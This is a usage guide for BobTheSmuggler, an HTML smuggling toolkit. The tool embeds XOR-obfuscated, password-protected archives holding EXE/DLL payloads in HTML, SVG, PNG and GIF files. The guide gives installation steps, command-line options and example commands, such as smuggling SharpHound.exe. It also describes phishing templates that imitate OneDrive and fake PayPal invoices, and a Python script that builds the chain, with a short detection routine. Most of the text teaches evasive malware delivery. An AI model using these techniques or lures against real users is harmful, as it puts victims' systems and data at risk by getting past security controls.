BobTheSmuggler: Advanced Payload Embedding and Obfuscation Toolkit


BobTheSmuggler is a tool for embedding payloads (EXE/DLL files) into HTML, PNG, GIF and SVG files so that they can be delivered by HTML smuggling, with obfuscation applied to reduce detection.

This guide walks through its features, setup and usage so you can understand how the delivery chain works and reproduce it in authorized testing and training.

Overview

BobTheSmuggler builds HTML smuggling payloads: an HTML file that carries a password-protected 7z/zip archive. The archive bytes are XOR-obfuscated (XOR with a key is obfuscation rather than strong encryption, but it defeats signature matching on the raw archive) and are either placed directly in the page's JavaScript or concealed inside an image file (PNG/GIF) that the page loads. Because the archive never crosses the wire as a recognizable file, perimeter controls that inspect downloads see only HTML and images.

When the page is opened, its embedded JavaScript reassembles the archive in the browser, undoes the XOR and hands the result to the user as a file download.

Supported Payload Delivery Chains

BobTheSmuggler supports multiple delivery chains for embedding EXE/DLL files:

  1. .EXE/.DLL → .7z/.Zip (Password Protected) → .JS → .HTML

  2. .EXE/.DLL → .7z/.Zip (Password Protected) → .JS → .SVG → .HTML

  3. .EXE/.DLL → .7z/.Zip (Password Protected) → .PNG/.GIF → .JS → .HTML

  4. .EXE/.DLL → .7z/.Zip (Password Protected) → .PNG/.GIF → JS → .SVG → .HTML
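The chain the tool automates, and the check a defender runs against the image side of it, written out as an added Python example. This is illustrative code, not BobTheSmuggler's own: the repeating-key XOR layout, the single-byte key, the password-less stdlib zip and the constructed 1x1 cover image are all assumptions of this example, and the real tool's byte layout may differ. It packs a stand-in payload into a zip, XORs it, appends it after the PNG's IEND chunk so the image still renders, then walks the PNG chunk list to find and recover the trailer, including brute-forcing a single-byte key from the known zip signature:

```python
import io
import struct
import zipfile
import zlib
from typing import Dict, Optional

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
ZIP_MAGIC = b"PK\x03\x04"          # local file header of the first zip entry


def _png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: big-endian length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_cover_png() -> bytes:
    """Constructed 1x1 opaque RGBA PNG used as the cover image (no image file needed)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 6, 0, 0, 0)   # width, height, bit depth 8, colour type 6 (RGBA)
    scanline = b"\x00" + b"\x00\x00\x00\xff"              # filter type 0 + one black pixel
    return (PNG_SIGNATURE + _png_chunk(b"IHDR", ihdr)
            + _png_chunk(b"IDAT", zlib.compress(scanline)) + _png_chunk(b"IEND", b""))


def pack_payload(filename: str, payload: bytes) -> bytes:
    """Zip the payload in memory. stdlib zipfile cannot set a password; the tool uses pyminizip/py7zr for that."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(filename, payload)
    return buf.getvalue()


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call obfuscates and deobfuscates (assumed layout, not the tool's)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def embed_after_iend(png: bytes, blob: bytes) -> bytes:
    """Append the obfuscated archive after IEND; decoders stop reading at IEND, so the image still renders."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("cover file is not a PNG")
    return png + blob


def find_trailer(data: bytes) -> bytes:
    """Defender side: walk the chunk list and return whatever follows IEND (b'' for a clean file)."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length = struct.unpack(">I", data[pos:pos + 4])[0]
        ctype = data[pos + 4:pos + 8]
        pos += 12 + length                 # 4 length + 4 type + data + 4 CRC
        if ctype == b"IEND":
            return data[pos:]
    raise ValueError("truncated PNG: no IEND chunk")


def recover_zip(trailer: bytes, key: bytes) -> Dict[str, bytes]:
    """Undo the XOR and read the archive back; {} if the result is not a zip."""
    plain = xor_bytes(trailer, key)
    if not plain.startswith(ZIP_MAGIC):
        return {}
    with zipfile.ZipFile(io.BytesIO(plain)) as zf:
        return {name: zf.read(name) for name in zf.namelist()}


def guess_single_byte_key(trailer: bytes) -> Optional[int]:
    """Key unknown? A single-byte XOR key falls straight out of the known zip magic at offset 0."""
    for k in range(256):
        if xor_bytes(trailer[:4], bytes([k])) == ZIP_MAGIC:
            return k
    return None


if __name__ == "__main__":
    payload = b"MZ" + b"\x90" * 64          # constructed stand-in for an EXE, not a real binary
    key = b"\x5a"                            # assumed single-byte key for the demonstration
    carrier = embed_after_iend(make_cover_png(), xor_bytes(pack_payload("payload.exe", payload), key))
    trailer = find_trailer(carrier)
    print(f"trailer bytes after IEND: {len(trailer)}, guessed key: {guess_single_byte_key(trailer):#x}")
    print("payload recovered:", recover_zip(trailer, key)["payload.exe"] == payload)
```

Run it as a script to see the trailer size and the recovered key. The detection half is the part worth keeping: any bytes after IEND in an image that a suspicious page fetches deserve a closer look regardless of the key, and a longer or non-repeating key only changes how the trailer is decoded, not whether it is there.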

Key Features

  • Stealthy File Concealment: Embed EXE/DLL files within HTML pages, PNG, GIF and SVG files so the payload never appears on the wire as a standalone download.

  • Versatile Embedding: Supports various formats to meet different use cases.

  • Advanced Obfuscation: Uses sophisticated techniques to reduce detectability.

  • Custom Templates: Allows the use of personalized HTML/SVG templates for embedding.

  • User-Friendly Interface: Command-line interface designed for both technical and non-technical users.

  • Visual Validation: Offers visualization tools to confirm successful embedding in PNG files.

Installation

Before installing BobTheSmuggler, ensure you have the required dependencies installed:

Pre-requisites

Run the following command to install the required Python libraries:

pip install python-magic py7zr pyminizip

Note: python-magic requires the libmagic library on your system (for example, the libmagic1 package on Debian/Ubuntu). Follow the instructions in the python-magic documentation to install it for your platform.

Installing BobTheSmuggler

Clone the repository and navigate to the project directory:

git clone https://github.com/TheCyb3rAlpha/BobTheSmuggler.git

cd BobTheSmuggler

Usage

Once installed, you can execute BobTheSmuggler using the following command:

python3 BobTheSmuggler.py -h

This will display all available options and arguments for using the tool.

Command-Line Options

  -i EXE_FILE              Path to the EXE/DLL file to embed.
  -p PASSWORD              Password for the 7z/zip archive (optional).
  -f OUTPUT_HTML           Name of the output HTML file.
  -o OUTPUT_FILENAME       Name the payload archive is saved as when the browser downloads it.
  -t {html,svg,png,gif}    Type of embedding template (html, svg, png or gif).
  -c {7z,zip}              Compression format (default: zip).
  -u PNG_URL               URL where the PNG/GIF carrying the payload is hosted; the HTML loads it from there.
  -png PNG_FILE            Path to a custom PNG file to carry the payload.
  -gif GIF_FILE            Path to a custom GIF file to carry the payload.
  -e CUSTOM_FILE           Custom HTML/SVG template for embedding.
  -v                       Enable verbose logging for detailed output.

Examples

Here are some practical examples of how you can use BobTheSmuggler:

1. Embed Payload in HTML

To compress an executable (SharpHound.exe) into a password-protected 7z archive and embed it in an HTML file:

python3 BobTheSmuggler.py -i path/to/SharpHound.exe -p 123456 -c 7z -f SharpHound.html -o SharpHound.7z -t html

2. Embed Payload Inside a PNG File

To create an HTML file whose payload is hidden inside a PNG image (pass the image with -png; the generated page loads it from the URL given with -u):

python3 BobTheSmuggler.py -i <Input_file_path> -p <password_to_encrypt> -f <output_HTML_filename> -o <Output_7z/zip_filename> -t png -png test.png

Note: For testing, the included Flask app (app.py) can host your PNG/GIF files locally on localhost:8000. For an engagement, host these files on a CDN or other web server you control, and make sure the URL passed with -u matches where the image is actually served from.

3. Embed Payload Inside a GIF File

To embed a payload inside a GIF file:

python3 BobTheSmuggler.py -i <Input_file_path> -p <password_to_encrypt> -f <output_HTML_filename> -o <Output_7z/zip_filename> -t gif -gif test.gif

4. Complex Chain with SVG

For more advanced delivery chains involving SVG templates:

python3 BobTheSmuggler.py -i <Input_file_path> -p <password_to_encrypt> -f <output_HTML_filename> -o <Output_7z/zip_filename> -t svg -e <Custom_SVG_Template>

Templates

BobTheSmuggler includes pre-built templates inspired by real-world attack mechanisms:

  1. OneDrive Download Template: Mimics OneDrive download pages used in malware delivery campaigns.

  2. PayPal Fake Invoice Template: A fake PayPal invoice page, modelled on the lures used in phishing campaigns.

Disclaimer

BobTheSmuggler is intended solely for educational purposes to promote learning about cybersecurity concepts and techniques. Any misuse of this tool beyond its educational intent is strictly discouraged, and users bear full responsibility for their actions.

By following this guide, you can explore how BobTheSmuggler works while adhering to ethical practices in cybersecurity research. You can learn more and download BobTheSmuggler on GitHub.
